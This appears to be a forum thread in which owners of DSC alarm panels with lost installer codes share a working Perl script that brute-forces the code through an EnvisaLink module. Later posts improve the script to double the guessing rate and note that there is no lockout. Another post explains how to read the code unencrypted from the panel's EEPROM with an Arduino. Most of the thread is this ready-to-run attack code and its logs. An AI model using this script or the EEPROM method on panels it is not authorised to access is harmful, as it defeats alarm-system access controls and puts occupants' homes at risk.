EVL 4, DSC and lost installer code - hacking my own system

Information and support for EnvisaLink modules.

Moderators: EyezOnRich, GrandWizard

Post Reply
sacha
Posts: 2
Joined: Sun Dec 29, 2019 3:20 am

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by sacha »

Hi,

I have been trying to use the code below but it keeps on failing following the authentication step. I have tried a several passwords but not luck. I was wondering if we need to use the DSC Master password or a password from our Envisalink portal. I am using the PC1616 model. I don't have my installer password since the company went bankrupt. We are looking for an alternative. From reading the reviews, this product sounds promising.

Thank you for your help.

Smith wrote:
mikep wrote:
From some googling I got the impression that clicks = Lockout is enabled, but people on the internet can often be confused.
Including, especially me! It was a very long time ago, so go with the internet majority. I don't recall which, I only remember DLS worked and I didn't need to reprogram the entire system...

Right 1616 has 6 zones plus one for each hardwired PK keypad (not sure about the other keypads).
Rightie O. Well, I'm testing blocks of 1000 installer codes now and then. It takes about 2.8 sec per attempt, so 45 min per block. Not sure yet if it will even work in the end but if it would work then it would be a nice feeling :mrgreen:

Here is the code I am using now in case anyone is curious, I guess about any linux system (including raspbian or mac) would have perl installed.

So far no keypad lockout despite 1000s of wrong attempts at getting into installer mode (it's a PC5015 board). I'll update here with either 'success' or 'fail'....

Code: Select all

#!/usr/bin/perl

use IO::Socket::INET;
use Time::HiRes qw ( time sleep );
 
# auto-flush on socket
$| = 1;

$socket = new IO::Socket::INET (
   PeerHost => '192.168.---------------------------------ADDRESS OF ENVISALINK---------------------------------',
   PeerPort => '4025',
   Proto => 'tcp',
);

die "cannot connect, $!\n" unless $socket;

print "connected\n";

DSC_get();

DSC_put(DSC_cmd("005", "---------------------------------PASSWORD---------------------------------")); 	# 005 - network login

$response = DSC_get();

foreach ($response) {
   /^5000052A.*5051CB/s && print("correct pass\n");
   /^5000052A.*5050CA/s && print("wrong pass\n") && exit(1);
   /^.*5052CC/s && print("timeout\n") && exit(1);	
}

open OUT, ">log." . zulu() . ".txt";

$t = time;
l0gt();

for ($code = 5000; $code < 5999; $code++) {
   l0gt(); 
   $scode = sprintf("%04d", $code);
   l0g("$scode\n");
   DSC_put(DSC_cmd("071", "1*8"));		# 071 send keys, partition 1, '*8' enter installer mode 
   DSC_get_ww("^922");				# 922 EVL requests installer code
   DSC_put(DSC_cmd("200", $scode));		# 200 send a code
   $r = DSC_get_ww("^6[58]");			# 6XX response 
   l0g($r."\n");
   DSC_put(DSC_cmd("071", "1##"));		# 071 send keys, partition 1, '##' possibly back out of installer menu
   l0g(DSC_get_w()."\n");   
   sleep(0.6);						# wait for messages to be processed, otherwise "Keybus Transmit Buffer Overrun"
   if ($r =~ /^680/) {l0g("success\n"); exit(0); }   
}

close OUT;
$socket->close();


sub l0gt {
   l0g("[" . sprintf("%.3f", time - $t) . "]\n");
}

sub l0g {
   my $s = shift;
   print $s; print OUT $s;
}

sub zulu {
   my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = gmtime(time);
   my $yyyymmddhhmmss = sprintf "%.4d%.2d%.2d_%.2d%.2d%.2dZ", $year+1900, $mon+1, $mday, $hour, $min, $sec;
   $yyyymmddhhmmss;
}


sub DSC_cs {
   my @chars = (split//, shift);
   my $cs = 0;
   foreach (@chars) { $cs += ord($_); }
   return sprintf("%.2X", $cs & 0xFF);
};

sub DSC_cmd {
   my $cmd = shift . shift;
   return $cmd.DSC_cs($cmd);
}

sub DSC_get {
   my $response = "";
   $socket->recv($response, 1024);
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   print "response: '$hresponse' (length " . length($response) .")\n";
   return $response;
}

sub DSC_get_w {		# wait for data
   my $response = "";
X: sleep(0.1);
   $socket->recv($response, 1024);
   if ($response eq "") { goto X; }
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   print "response: '$hresponse' (length " . length($response) .")\n";
   return $response;
}

sub DSC_get_ww {		# wait for specific data
   my $response = "";
   my $wanted = shift;
X: sleep(0.1);
   $socket->recv($response, 1024);
   if ($response eq "") { goto X; }
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   print "response: '$hresponse' (length " . length($response) .")\n";
   unless ($response =~ /$wanted/) { goto X; }
   return $response;
}

sub DSC_put {
   my $req = shift . "\r\n";
   my $size = $socket->send($req);
   my $hreq = $req; $hreq =~ s/\n/\\n/g; $hreq =~ s/\r/\\r/g;
   print "sent data '$hreq' (length $size)\n";
}
Top
sacha
Posts: 2
Joined: Sun Dec 29, 2019 3:20 am

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by sacha »

Disregard, found the issue. It is now working.
sacha wrote:Hi,

I have been trying to use the code below but it keeps on failing following the authentication step. I have tried a several passwords but not luck. I was wondering if we need to use the DSC Master password or a password from our Envisalink portal. I am using the PC1616 model. I don't have my installer password since the company went bankrupt. We are looking for an alternative. From reading the reviews, this product sounds promising.

Thank you for your help.

Smith wrote:
mikep wrote: Including, especially me! It was a very long time ago, so go with the internet majority. I don't recall which, I only remember DLS worked and I didn't need to reprogram the entire system...

Right 1616 has 6 zones plus one for each hardwired PK keypad (not sure about the other keypads).
Rightie O. Well, I'm testing blocks of 1000 installer codes now and then. It takes about 2.8 sec per attempt, so 45 min per block. Not sure yet if it will even work in the end but if it would work then it would be a nice feeling :mrgreen:

Here is the code I am using now in case anyone is curious, I guess about any linux system (including raspbian or mac) would have perl installed.

So far no keypad lockout despite 1000s of wrong attempts at getting into installer mode (it's a PC5015 board). I'll update here with either 'success' or 'fail'....

Code: Select all

#!/usr/bin/perl

use IO::Socket::INET;
use Time::HiRes qw ( time sleep );
 
# auto-flush on socket
$| = 1;

$socket = new IO::Socket::INET (
   PeerHost => '192.168.---------------------------------ADDRESS OF ENVISALINK---------------------------------',
   PeerPort => '4025',
   Proto => 'tcp',
);

die "cannot connect, $!\n" unless $socket;

print "connected\n";

DSC_get();

DSC_put(DSC_cmd("005", "---------------------------------PASSWORD---------------------------------")); 	# 005 - network login

$response = DSC_get();

foreach ($response) {
   /^5000052A.*5051CB/s && print("correct pass\n");
   /^5000052A.*5050CA/s && print("wrong pass\n") && exit(1);
   /^.*5052CC/s && print("timeout\n") && exit(1);	
}

open OUT, ">log." . zulu() . ".txt";

$t = time;
l0gt();

for ($code = 5000; $code < 5999; $code++) {
   l0gt(); 
   $scode = sprintf("%04d", $code);
   l0g("$scode\n");
   DSC_put(DSC_cmd("071", "1*8"));		# 071 send keys, partition 1, '*8' enter installer mode 
   DSC_get_ww("^922");				# 922 EVL requests installer code
   DSC_put(DSC_cmd("200", $scode));		# 200 send a code
   $r = DSC_get_ww("^6[58]");			# 6XX response 
   l0g($r."\n");
   DSC_put(DSC_cmd("071", "1##"));		# 071 send keys, partition 1, '##' possibly back out of installer menu
   l0g(DSC_get_w()."\n");   
   sleep(0.6);						# wait for messages to be processed, otherwise "Keybus Transmit Buffer Overrun"
   if ($r =~ /^680/) {l0g("success\n"); exit(0); }   
}

close OUT;
$socket->close();


sub l0gt {
   l0g("[" . sprintf("%.3f", time - $t) . "]\n");
}

sub l0g {
   my $s = shift;
   print $s; print OUT $s;
}

sub zulu {
   my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = gmtime(time);
   my $yyyymmddhhmmss = sprintf "%.4d%.2d%.2d_%.2d%.2d%.2dZ", $year+1900, $mon+1, $mday, $hour, $min, $sec;
   $yyyymmddhhmmss;
}


sub DSC_cs {
   my @chars = (split//, shift);
   my $cs = 0;
   foreach (@chars) { $cs += ord($_); }
   return sprintf("%.2X", $cs & 0xFF);
};

sub DSC_cmd {
   my $cmd = shift . shift;
   return $cmd.DSC_cs($cmd);
}

sub DSC_get {
   my $response = "";
   $socket->recv($response, 1024);
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   print "response: '$hresponse' (length " . length($response) .")\n";
   return $response;
}

sub DSC_get_w {		# wait for data
   my $response = "";
X: sleep(0.1);
   $socket->recv($response, 1024);
   if ($response eq "") { goto X; }
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   print "response: '$hresponse' (length " . length($response) .")\n";
   return $response;
}

sub DSC_get_ww {		# wait for specific data
   my $response = "";
   my $wanted = shift;
X: sleep(0.1);
   $socket->recv($response, 1024);
   if ($response eq "") { goto X; }
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   print "response: '$hresponse' (length " . length($response) .")\n";
   unless ($response =~ /$wanted/) { goto X; }
   return $response;
}

sub DSC_put {
   my $req = shift . "\r\n";
   my $size = $socket->send($req);
   my $hreq = $req; $hreq =~ s/\n/\\n/g; $hreq =~ s/\r/\\r/g;
   print "sent data '$hreq' (length $size)\n";
}
Top
Simon
Posts: 3
Joined: Wed Jul 03, 2013 9:49 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by Simon »

Sorry for being a Perl dunce. But can anyone help with this error?

Code: Select all

connected
response: '' (length 0)
send: Cannot determine peer address at ./alarm1.pl line 115.
Top
edirol
Posts: 3
Joined: Fri Jun 12, 2020 6:01 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by edirol »

Hi Smith,

Thanks for posting this code as it helped me recover my installer code after purchasing a home with an existing DSC system.

I've modified it a bit with:
- major: will retry code entry immediately if presented option
- minor: some more comments
- minor: more debug output
- minor: logs in localtime vs zulu

On my DSC system, it allows 2 attempts every 30s, so this code modification doubled the testing rate.

Thanks,
- Edirol

Here's the updated code:

Code: Select all

#!/usr/bin/perl

use IO::Socket::INET;
use Time::HiRes qw ( time sleep );

############################
# Edit the variables below #
############################

# This is the IP of your EnvisaLink 
# eg. 192.168.0.X, 10.0.0.X, etc.
$ip = "---------------------------------ADDRESS OF ENVISALINK---------------------------------"; 

# This is your EnvisaLink password.  The default is user if you haven't changed it. 
$password = "user";

# Range which you want to test 
$code_start = "0000";
$code_end = "9999";

###############################################
# You shouldn't need to modify the code below #
###############################################

# auto-flush on socket
# force a flush after every write/print 
$| = 1;

# Opens a new network socket on port 4025 (default port of EnvisaLink)
$socket = new IO::Socket::INET (
   PeerHost => $ip,
   PeerPort => '4025',
   Proto => 'tcp',
);

die "DEBUG: Cannot connect to EnvisaLink. REASON: $!\n" unless $socket;

# Start logging
# open OUT, ">log." . currenttime() . ".txt";
open(OUT, '>', "log." . currenttime() . ".txt") or die $!;

l0gt("DEBUG: Connected to EnvisaLink");

DSC_get();

DSC_put(DSC_cmd("005", $password));    # 005 - network login

$response = DSC_get();

foreach ($response) {
   /^5000052A.*5051CB/s && l0gt("DEBUG: Correct EnvisaLink password");
   /^5000052A.*5050CA/s && l0gt("DEBUG: Incorrect EnvisaLink password") && exit(1);
   /^.*5052CC/s && l0gt("DEBUG: Timeout") && exit(1);   
}

$t = time;

for ($code = $code_start; $code <= $code_end; $code++) {
   l0gt("DEBUG: Start installer mode entry cycle");
   DSC_put(DSC_cmd("071", "1*8"));      # 071 send keys, partition 1, '*8' enter installer mode
   DSC_get_ww("^922");            #  Wait for 922 (EVL requests installer code)
   $scode = sprintf("%04d", $code); # Pad code with leading 0s if <1000
   l0gt("DEBUG: Attempting $scode");
   DSC_put(DSC_cmd("200", $scode));      # 200 send a code

   # if the code is wrong you will get a 670 response and it will request another installer code via 922
   # on my system it will only let you try again once via a 922 
   # 650=partition ready, 670=invalid access code, 680=system is in installer mode 

   $r = DSC_get_ww("^922|^6[58]"); #look for retry or ready or installer mode code  

   # try again if given opportunity via 922
   while ($r =~ /^922/) {
      l0gt("DEBUG: Trying again within same cycle");
      $code++;
      $scode = sprintf("%04d", $code);
      l0gt("DEBUG: Attempting $scode");
      DSC_put(DSC_cmd("200", $scode));
      $r = DSC_get_ww("^922|^6[58]"); #look for retry or ready or installer mode code
   }

   l0gt("DEBUG: If we're in installer mode, back out to main menu");
   DSC_put(DSC_cmd("071", "1##"));      # 071 send keys, partition 1, '##' possibly back out of installer menu
   DSC_get_w();
   sleep(0.6);                  # wait for messages to be processed, otherwise "Keybus Transmit Buffer Overrun"
   if ($r =~ /^680/) {l0gt("SUCCESS: $scode is the installer code"); exit(0); }   
   l0gt("DEBUG: End installer mode entry cycle");
}

close OUT;
$socket->close();

# This will create a timestamp in localtime
sub l0gt {
   my $s = shift;
   my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
   l0g("[" . sprintf("%.4d%.2d%.2d_%.2d%.2d%.2d", $year+1900, $mon+1, $mday, $hour, $min, $sec) . "] $s");
}

# This prints to STDOUT as well as logfile
sub l0g {
   my $s = shift;
   print "$s\n";
   print OUT "$s\n";
}

sub currenttime {
   my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
   my $yyyymmddhhmmss = sprintf "%.4d%.2d%.2d_%.2d%.2d%.2d", $year+1900, $mon+1, $mday, $hour, $min, $sec;
   $yyyymmddhhmmss;
}

# Converts text to ASCII values 
sub DSC_cs {
   my @chars = (split//, shift);
   my $cs = 0;
   foreach (@chars) { $cs += ord($_); }
   return sprintf("%.2X", $cs & 0xFF);
};

# Formats command 
sub DSC_cmd {
   my $cmd = shift . shift;
   return $cmd.DSC_cs($cmd);
}

# Logs a response 
sub DSC_get {
   my $response = "";
   $socket->recv($response, 1024);
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   l0gt("response: '$hresponse' (length " . length($response) .")");
   return $response;
}

# Waits for response(s) and logs it
sub DSC_get_w {      # wait for data
   my $response = "";
X: sleep(0.1);
   $socket->recv($response, 1024);
   if ($response eq "") { goto X; }
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   l0gt("response: '$hresponse' (length " . length($response) .")");
   return $response;
}

# Waits for a specific response and logs it
sub DSC_get_ww {      # wait for specific data
   my $response = "";
   my $wanted = shift;
X: sleep(0.1);
   $socket->recv($response, 1024);
   if ($response eq "") { goto X; }
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   l0gt("response: '$hresponse' (length " . length($response) .")");
   unless ($response =~ /$wanted/) { goto X; }
   return $response;
}

# Sends a command and logs it
sub DSC_put {
   my $req = shift . "\r\n";
   my $size = $socket->send($req);
   my $hreq = $req; $hreq =~ s/\n/\\n/g; $hreq =~ s/\r/\\r/g;
   l0gt("sent data '$hreq' (length $size)");
}
Smith wrote:
mikep wrote:
From some googling I got the impression that clicks = Lockout is enabled, but people on the internet can often be confused.
Including, especially me! It was a very long time ago, so go with the internet majority. I don't recall which, I only remember DLS worked and I didn't need to reprogram the entire system...

Right 1616 has 6 zones plus one for each hardwired PK keypad (not sure about the other keypads).
Rightie O. Well, I'm testing blocks of 1000 installer codes now and then. It takes about 2.8 sec per attempt, so 45 min per block. Not sure yet if it will even work in the end but if it would work then it would be a nice feeling :mrgreen:

Here is the code I am using now in case anyone is curious, I guess about any linux system (including raspbian or mac) would have perl installed.

So far no keypad lockout despite 1000s of wrong attempts at getting into installer mode (it's a PC5015 board). I'll update here with either 'success' or 'fail'....
Top
randy.bodek.69
Posts: 1
Joined: Wed Jun 17, 2020 9:47 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by randy.bodek.69 »

Hi, I came across this thread as part of my research today - I have a PC1864 that is installer locked (rapid clicks on power-up). I ended up using an Arduino and the dscKeybusInterface library to brute-force it. (pastebin)

I got a bit more interested and decided to dump the EEPROM - the installer code is held unencrypted in there at 0x5056 - 0x5058. There are three bytes, although only two are used for a four-digit code (I would assume the first one is used if six-digit is enabled - it defaults to 0x55). Examples:

0x55 0x55 0x55 = 5555 (default)
0x55 0x34 0x12 = 1234

You can read the EEPROM in-circuit with an Arduino and the i2c_read_eeprom sketch set to read 16kbytes. The SDA and SCL pins are available as pictured (the resistors are a little easier to solder to than the legs of the chip), and the reset point has to be connected to ground while you are reading, otherwise the DSC CPU will interfere.

https://imgur.com/a/B4iSC8Q
Top
Wicky
Posts: 1
Joined: Fri Jun 19, 2020 12:00 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by Wicky »

Hi Edirol,

Thanks for your code. I am trying yours now in my DSC 5010, Envisalink 4, Pi Raspbian. Two days now still running no luck. How do I know what is current progress from screen output? Is it working as it should be?

Post some of the screen output here:

[20200619_085258] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_085604] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_085615] response: '61000229\r\n' (length 10)
[20200619_085615] response: '6501CC\r\n' (length 8)
[20200619_085707] response: '51110F8\r\n51080FE\r\n8490C18\r\n' (length 27)
[20200619_085707] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_085739] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_085740] response: '61000229\r\n' (length 10)
[20200619_085741] response: '6501CC\r\n' (length 8)
[20200619_090044] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_090045] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_090057] response: '60900231\r\n' (length 10)
[20200619_090058] response: '6531CF\r\n' (length 8)
[20200619_090101] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_090116] response: '51110F8\r\n51080FE\r\n8490C18\r\n' (length 27)
[20200619_090117] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_090328] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_090339] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_090526] response: '51110F8\r\n51080FE\r\n8490C18\r\n' (length 27)
[20200619_090526] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_090935] response: '51110F8\r\n51080FE\r\n8490C18\r\n' (length 27)
[20200619_090935] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_091157] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091158] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091202] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091204] response: '61000229\r\n' (length 10)
[20200619_091205] response: '6501CC\r\n' (length 8)
[20200619_091206] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091216] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091225] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091234] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091240] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091243] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091344] response: '51110F8\r\n51080FE\r\n8490C18\r\n' (length 27)
[20200619_091345] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_091410] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091413] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091430] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091439] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091454] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091458] response: '61000229\r\n6501CC\r\n' (length 18)

Wicky
edirol wrote:Hi Smith,

Thanks for posting this code as it helped me recover my installer code after purchasing a home with an existing DSC system.

I've modified it a bit with:
- major: will retry code entry immediately if presented option
- minor: some more comments
- minor: more debug output
- minor: logs in localtime vs zulu

On my DSC system, it allows 2 attempts every 30s, so this code modification doubled the testing rate.

Thanks,
- Edirol

Here's the updated code:

Code: Select all

#!/usr/bin/perl

use IO::Socket::INET;
use Time::HiRes qw ( time sleep );

############################
# Edit the variables below #
############################

# This is the IP of your EnvisaLink 
# eg. 192.168.0.X, 10.0.0.X, etc.
$ip = "---------------------------------ADDRESS OF ENVISALINK---------------------------------"; 

# This is your EnvisaLink password.  The default is user if you haven't changed it. 
$password = "user";

# Range which you want to test 
$code_start = "0000";
$code_end = "9999";

###############################################
# You shouldn't need to modify the code below #
###############################################

# auto-flush on socket
# force a flush after every write/print 
$| = 1;

# Opens a new network socket on port 4025 (default port of EnvisaLink)
$socket = new IO::Socket::INET (
   PeerHost => $ip,
   PeerPort => '4025',
   Proto => 'tcp',
);

die "DEBUG: Cannot connect to EnvisaLink. REASON: $!\n" unless $socket;

# Start logging
# open OUT, ">log." . currenttime() . ".txt";
open(OUT, '>', "log." . currenttime() . ".txt") or die $!;

l0gt("DEBUG: Connected to EnvisaLink");

DSC_get();

DSC_put(DSC_cmd("005", $password));    # 005 - network login

$response = DSC_get();

foreach ($response) {
   /^5000052A.*5051CB/s && l0gt("DEBUG: Correct EnvisaLink password");
   /^5000052A.*5050CA/s && l0gt("DEBUG: Incorrect EnvisaLink password") && exit(1);
   /^.*5052CC/s && l0gt("DEBUG: Timeout") && exit(1);   
}

$t = time;

for ($code = $code_start; $code <= $code_end; $code++) {
   l0gt("DEBUG: Start installer mode entry cycle");
   DSC_put(DSC_cmd("071", "1*8"));      # 071 send keys, partition 1, '*8' enter installer mode
   DSC_get_ww("^922");            #  Wait for 922 (EVL requests installer code)
   $scode = sprintf("%04d", $code); # Pad code with leading 0s if <1000
   l0gt("DEBUG: Attempting $scode");
   DSC_put(DSC_cmd("200", $scode));      # 200 send a code

   # if the code is wrong you will get a 670 response and it will request another installer code via 922
   # on my system it will only let you try again once via a 922 
   # 650=partition ready, 670=invalid access code, 680=system is in installer mode 

   $r = DSC_get_ww("^922|^6[58]"); #look for retry or ready or installer mode code  

   # try again if given opportunity via 922
   while ($r =~ /^922/) {
      l0gt("DEBUG: Trying again within same cycle");
      $code++;
      $scode = sprintf("%04d", $code);
      l0gt("DEBUG: Attempting $scode");
      DSC_put(DSC_cmd("200", $scode));
      $r = DSC_get_ww("^922|^6[58]"); #look for retry or ready or installer mode code
   }

   l0gt("DEBUG: If we're in installer mode, back out to main menu");
   DSC_put(DSC_cmd("071", "1##"));      # 071 send keys, partition 1, '##' possibly back out of installer menu
   DSC_get_w();
   sleep(0.6);                  # wait for messages to be processed, otherwise "Keybus Transmit Buffer Overrun"
   if ($r =~ /^680/) {l0gt("SUCCESS: $scode is the installer code"); exit(0); }   
   l0gt("DEBUG: End installer mode entry cycle");
}

close OUT;
$socket->close();

# This will create a timestamp in localtime
sub l0gt {
   my $s = shift;
   my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
   l0g("[" . sprintf("%.4d%.2d%.2d_%.2d%.2d%.2d", $year+1900, $mon+1, $mday, $hour, $min, $sec) . "] $s");
}

# This prints to STDOUT as well as logfile
sub l0g {
   my $s = shift;
   print "$s\n";
   print OUT "$s\n";
}

sub currenttime {
   my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
   my $yyyymmddhhmmss = sprintf "%.4d%.2d%.2d_%.2d%.2d%.2d", $year+1900, $mon+1, $mday, $hour, $min, $sec;
   $yyyymmddhhmmss;
}

# Converts text to ASCII values 
sub DSC_cs {
   my @chars = (split//, shift);
   my $cs = 0;
   foreach (@chars) { $cs += ord($_); }
   return sprintf("%.2X", $cs & 0xFF);
};

# Formats command 
sub DSC_cmd {
   my $cmd = shift . shift;
   return $cmd.DSC_cs($cmd);
}

# Logs a response 
sub DSC_get {
   my $response = "";
   $socket->recv($response, 1024);
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   l0gt("response: '$hresponse' (length " . length($response) .")");
   return $response;
}

# Waits for response(s) and logs it
sub DSC_get_w {      # wait for data
   my $response = "";
X: sleep(0.1);
   $socket->recv($response, 1024);
   if ($response eq "") { goto X; }
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   l0gt("response: '$hresponse' (length " . length($response) .")");
   return $response;
}

# Waits for a specific response and logs it
sub DSC_get_ww {      # wait for specific data
   my $response = "";
   my $wanted = shift;
X: sleep(0.1);
   $socket->recv($response, 1024);
   if ($response eq "") { goto X; }
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   l0gt("response: '$hresponse' (length " . length($response) .")");
   unless ($response =~ /$wanted/) { goto X; }
   return $response;
}

# Sends a command and logs it
sub DSC_put {
   my $req = shift . "\r\n";
   my $size = $socket->send($req);
   my $hreq = $req; $hreq =~ s/\n/\\n/g; $hreq =~ s/\r/\\r/g;
   l0gt("sent data '$hreq' (length $size)");
}
Smith wrote:
mikep wrote: Including, especially me! It was a very long time ago, so go with the internet majority. I don't recall which, I only remember DLS worked and I didn't need to reprogram the entire system...

Right 1616 has 6 zones plus one for each hardwired PK keypad (not sure about the other keypads).
Rightie O. Well, I'm testing blocks of 1000 installer codes now and then. It takes about 2.8 sec per attempt, so 45 min per block. Not sure yet if it will even work in the end but if it would work then it would be a nice feeling :mrgreen:

Here is the code I am using now in case anyone is curious, I guess about any linux system (including raspbian or mac) would have perl installed.

So far no keypad lockout despite 1000s of wrong attempts at getting into installer mode (it's a PC5015 board). I'll update here with either 'success' or 'fail'....
Top
edirol
Posts: 3
Joined: Fri Jun 12, 2020 6:01 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by edirol »

Wicky,

Your log entry should look something like this as it cycles through the codes (Note: I have a DSC 1616). If you don't see the "attempting" line incrementing then your module is returning responses the code isn't expecting, so it'll keep waiting until it gets a predicted response.

Code: Select all

...
[20200619_185630] DEBUG: Correct EnvisaLink password
[20200619_185630] DEBUG: Start installer mode entry cycle
[20200619_185630] sent data '0711*82B\r\n' (length 10)
[20200619_185630] response: '5000712D\r\n' (length 10)
[20200619_185631] response: '51080FE\r\n' (length 9)
[20200619_185631] response: '9229D\r\n' (length 7)
[20200619_185631] DEBUG: Attempting 0000
[20200619_185631] sent data '200000052\r\n' (length 11)
[20200619_185631] response: '50020027\r\n' (length 10)
[20200619_185631] response: '6701CE\r\n' (length 8)
[20200619_185634] response: '9229D\r\n' (length 7)
[20200619_185634] DEBUG: Trying again within same cycle
[20200619_185634] DEBUG: Attempting 0001
[20200619_185634] sent data '200000153\r\n' (length 11)
[20200619_185634] response: '50020027\r\n' (length 10)
[20200619_185635] response: '6701CE\r\n' (length 8)
[20200619_185656] response: '51081FF\r\n' (length 9)
[20200619_185657] response: '6501CC\r\n' (length 8)
[20200619_185657] DEBUG: If we're in installer mode, back out to main menu
[20200619_185657] sent data '0711##0F\r\n' (length 10)
[20200619_185657] response: '5000712D\r\n' (length 10)
[20200619_185657] DEBUG: End installer mode entry cycle
[20200619_185657] DEBUG: Start installer mode entry cycle
...
Take a look at your log and see where it's stuck in a waiting loop. The DEBUG lines output at specific points in the loop.

Thanks,
- Edirol
Wicky wrote:Hi Edirol,

Thanks for your code. I am trying yours now in my DSC 5010, Envisalink 4, Pi Raspbian. Two days now still running no luck. How do I know what is current progress from screen output? Is it working as it should be?

Post some of the screen output here:

[20200619_085258] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_085604] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_085615] response: '61000229\r\n' (length 10)
[20200619_085615] response: '6501CC\r\n' (length 8)
[20200619_085707] response: '51110F8\r\n51080FE\r\n8490C18\r\n' (length 27)
[20200619_085707] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_085739] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_085740] response: '61000229\r\n' (length 10)
[20200619_085741] response: '6501CC\r\n' (length 8)
[20200619_090044] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_090045] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_090057] response: '60900231\r\n' (length 10)
[20200619_090058] response: '6531CF\r\n' (length 8)
[20200619_090101] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_090116] response: '51110F8\r\n51080FE\r\n8490C18\r\n' (length 27)
[20200619_090117] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_090328] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_090339] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_090526] response: '51110F8\r\n51080FE\r\n8490C18\r\n' (length 27)
[20200619_090526] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_090935] response: '51110F8\r\n51080FE\r\n8490C18\r\n' (length 27)
[20200619_090935] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_091157] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091158] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091202] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091204] response: '61000229\r\n' (length 10)
[20200619_091205] response: '6501CC\r\n' (length 8)
[20200619_091206] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091216] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091225] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091234] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091240] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091243] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091344] response: '51110F8\r\n51080FE\r\n8490C18\r\n' (length 27)
[20200619_091345] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_091410] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091413] response: '61000229\r\n6501CC\r\n' (length 18)
